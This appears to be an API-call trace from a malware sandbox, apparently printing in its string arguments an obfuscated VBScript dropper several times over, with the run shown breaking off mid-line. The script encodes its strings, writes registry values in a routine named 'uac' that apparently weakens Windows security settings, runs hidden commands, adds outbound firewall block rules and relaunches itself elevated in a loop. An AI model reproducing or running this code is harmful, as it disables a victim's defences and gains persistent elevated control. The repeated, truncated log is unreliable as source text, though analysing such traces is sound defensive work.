bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 37 [0226.321] wcsncmp (_String1=")\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.321] wcsncmp (_String1="\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61 [0226.321] wcsncmp (_String1="\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.321] wcsncmp (_String1="dim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 